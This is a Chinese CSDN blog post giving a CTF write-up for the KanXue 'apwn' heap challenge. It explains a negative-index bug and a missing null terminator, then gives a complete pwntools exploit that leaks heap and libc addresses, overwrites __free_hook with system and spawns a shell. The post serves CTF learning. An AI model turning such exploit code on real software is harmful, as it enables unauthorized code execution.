看雪CTF 拯救单身狗 apwn

最新推荐文章于 2023-06-19 11:44:44 发布
最新推荐文章于 2023-06-19 11:44:44 发布
阅读量727 收藏
点赞数
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowleopard_bin/article/details/88880477
版权

漏洞类型

堆的整数负数溢出

保护机制

全保护

关键代码

if ( two[v1] )//没考虑负数
  {
    puts("Oh,singledog,changing your name can bring you good luck.");
    read(0, (void *)two[v1], 0x20uLL);
    printf("new name: %s", two[v1]);
  }
if ( one[v1] )//同样没考虑负数
  {
    puts("Oh,luckydog,What is your new name?");
    read(0, (void *)(one[v1] + 8LL), 0x18uLL);
    puts("your partner's new name");
    read(0, *(void **)one[v1], 0x20uLL);
  }

只考虑是否有效,没考虑int 整型的v1是否为负数。造成整数溢出。

而且read输入后没有\x00截断,给Leak形成条件

利用思路

1、利用read没有截断leak出libc和堆地址

2、改free_hook为system('/bin/sh')

EXP

from pwn import *
context.os='Linux'
context.arch='amd64'
debug = 1
if debug:
	context.log_level='debug'
	cn=process('./apwn')
	#cn=process('./the_end',env={'LD_PRELOAD':'./lib/i386-linux-gnu/libc-2.23.so'})
	elf=ELF('./apwn')
	libc=elf.libc
	#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
	#libc = ELF('./libc6-i386_2.23-0ubuntu10_amd64.so')

s       = lambda data               :cn.send(str(data))
sa      = lambda delim,data         :cn.sendafter(str(delim), str(data)) 
st      = lambda delim,data         :cn.sendthen(str(delim), str(data)) 
sl      = lambda data               :cn.sendline(str(data)) 
sla     = lambda delim,data         :cn.sendlineafter(str(delim), str(data))
r       = lambda numb=4096          :cn.recv(numb)
rl	= lambda 	            :cn.recvline()
ru      = lambda delims             :cn.recvuntil(delims)
irt     = lambda                    :cn.interactive()
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
def create_luckydog(name,partner):
	ru('>>')
	sl(2)
	s(name)
	ru("your partner's name")
	s(partner)
def create_singledog(name):
	ru('>>')
	sl(1)
	s(name)
def edit_singledog(index,name):
	ru('>>')
	sl(3)
	sl(index)
	#ru('Oh,singledog,changing your name can bring you good luck.')
	s(name)
def edit_luckydog(index,name,partner):
	ru('>>')
	sl(4)
	sl(index)
	s(name)
	s(partner)
def dele():
	ru('>>')
	sl(5)

create_singledog('/bin/sh\x00'+'\x00'*0x18)#two[0]
create_luckydog('b'*0x18,'c'*0x20)#one[0]
create_singledog('/bin/sh\x00')#two[1]
create_luckydog('e'*0x18,'f'*0x20)#one[1]

#leak heap
dele()
dele()
create_singledog('\x30')
edit_singledog(0,'\x30')
ru('new name: ')
heap = uu64(r(6))-0x30
success('heap= {}'.format(hex(heap)))

#leak start
'''
edit_singledog(-11,'\x08')
ru('new name: ')
start = uu64(r(6))-0x202008
success('start= {}'.format(hex(start)))
'''
#leak libc

edit_singledog(-11,'\x20')
ru('new name: ')
libc_base = uu64(r(6))-libc.symbols['_IO_2_1_stdout_']#0x3c5620

success('libc_base= {}'.format(hex(libc_base)))

'''
edit_singledog(-4,'11111111')
ru('11111111')
#gdb.attach(cn)
libc_base = uu64(r(6))-0x3ec703 #remote
'''
success('libc_base= {}'.format(hex(libc_base)))
#write free_hook
free_hook=libc_base+libc.symbols['__free_hook']
sys=libc_base+libc.symbols['system']
success('free_hook= {}'.format(hex(free_hook)))
success('system= {}'.format(hex(sys)))
edit_singledog(80,p64(free_hook))
edit_luckydog(0,'a'*0x18,p64(sys)+'\x00'*0x18)

edit_singledog(80,p64(heap+0x100))
edit_luckydog(0,'a'*0x18,'/bin/sh\x00'+'\x00'*0x18)

#gdb.attach(cn)
dele()

irt()
snowleopard_bin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctfshow单身 -- web
cainsoftware的博客
07-21 540
看到入参file判断项是strrev(反转)==正常入参刚开始考虑过弱等于绕过,但是include没啥用,后来了解到2个知识点,,1.第一可以利用data//伪协议,2.php?>后的内容不再进行运算所以可以构造如下file=data?>通过py反转构造完整payload签到题这么难?签到题不应该是有手就行的那种吗。...
ARM pwn 入门 (1)
CoLin的pwn小屋
11-02 1139
ARM pwn 入门(1) —— 前置知识
2019看CTF晋级赛Q1——apwn
04-18 337
保护全开  #数组越界 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 __int64 savedregs; // [rsp+10h] [rbp+0h] 4 5 puts("This is a little game\n"); 6 ...
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
CTF之GIF图片分离工具
最新发布
02-23
misc方向直接GIF图片分离
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
ctf misc 杂项 snow隐写加解密
09-03
ctf misc 杂项 snow隐写加解密工具 压缩包中有snow隐写工具帮助手册,值得下载。 SNOW.EXE -C 2.txt Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息" -p 密码 "文件名" snow -C -m "I am lying" -p "hello world" infile outfile snow -C -p "hello world" outfile snow -C -l 72 -m "I am lying" infile outfile snow -S -l 72 infile snow [ -CQS ] [ -p passwd ] [ -l line-len ] [ -f file | -m message ] [ infile [ outfile ]] OPTIONS -Q Quiet mode. If not set, the program reports statistics such as compression percenta
湖湘杯2021-pwn-final部分复现
qq_53062301的博客
12-09 4909
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘杯是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
CTF杂项南城旧梦-BugKu
m0_61011147的博客
01-04 3574
1.mmz.bmp图片文件尾有一段DE@@= 意思是使用工具stool,密码是qeadzc,这个工具使用的话要直接把图片拖进去,解密的话是这个选项,输入密码就可以解出Key.txt,得到把酒言欢.rar的密码mmzbudaiwowuwuwu~~~## 2.倾听.txt是 SNOW隐写【snow隐写见下图】,解密可以得到密码表 3.使用E:\CTF比赛\工具箱\ctf工具箱\爆破工具\Accent RAR Password Recovery\Accent RAR Password
XCTF-MISC-看
weixin_45723896的博客
06-19 566
先把十六进制转换成十进制,观察发现每个数都小于128,分析是ASCII码,按照ASCII码对字符串进行解码,得到snow!打开flag文件,Ctrl+A全选文件(这里要用Ctrl+A全选,因为文件中有空格,空格也是密文)复制到一个新的flag.txt文件中,并把flag.txt文件放到snow.exe文件夹下,可以看到password和flag文件,依次打开password的文件得到字符串:他朝若是同淋,得到密码。查看后发现并没有有用的信息,转换思路,更改长宽高,发现也没有有用的信息。
[天权信安&catf1ag] crypto,pwn部分
weixin_52640415的博客
12-09 1128
天权信安&catf1ag
BugkuCTF练习平台pwn5(human)的writeup
只影的博客
03-04 920
这道题的思路相对简单,但是比较有代表性。 首先查看防护机制,发现只打开了NX。用ida打开题目,发现中文无法识别为字符串。这里需要用命令行打开ida,新建bat并编辑内容为D:\IDA_Pro_v7.0\ida64.exe -dCULTURE=all human即可。 漏洞有两处,第一处比较明显,是格式化字符串漏洞,如下所示。 memset(&s, 0, 0x20uLL); put...
CTF 六大方向基础工具合集
网络安全
11-27 4783
今天来为大家分享CTF 六大方向基础工具简介集合。本文中提到的所有工具在ctf部落中均有,加入方式见文末。
BUUCTF [SUCTF2018]single dog
qq_53030229的博客
11-10 669
文章目录一、使用010editor打开 一、使用010editor打开        1、使用010模板,选择jpg类型,因为图片后缀jpg,如果没有选择2,去模板库下载        2、发现图片有问题,逐步看下去,发现压缩包        3、010新建16进制文件窗口,保存zip &nbs
BUUCTF misc 专题(68)[SUCTF2018]single dog
tt_npc的博客
04-28 1184
看题目,single dog,下载附件 是这样一张图片,先查看属性的详情信息,并没有任何发现,将它拖入winhex查看 在底部发现了压缩包 拖入kali中分离出压缩包 打开压缩包查看 发现是一个txt 这就想到了jjencode和aaencode解密 jjencode与aaencode解密工具-jjencode解密-aaencode解密-在线工具 将文本全选进框,点击aaencode解密 得到答案SUCTF{happy double eleven} 包上...
第四题点评及解题思路——拯救单身1
08-03
本文是关于《拯救单身CTF比赛第四题的点评及解题思路。本次比赛由一个名为“拯救单身”的团队发起,旨在通过解题活动来拯救那些孤独的单身,因此吸引了大量围观人数和44支战队的参与。这道题目的设计围绕着...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值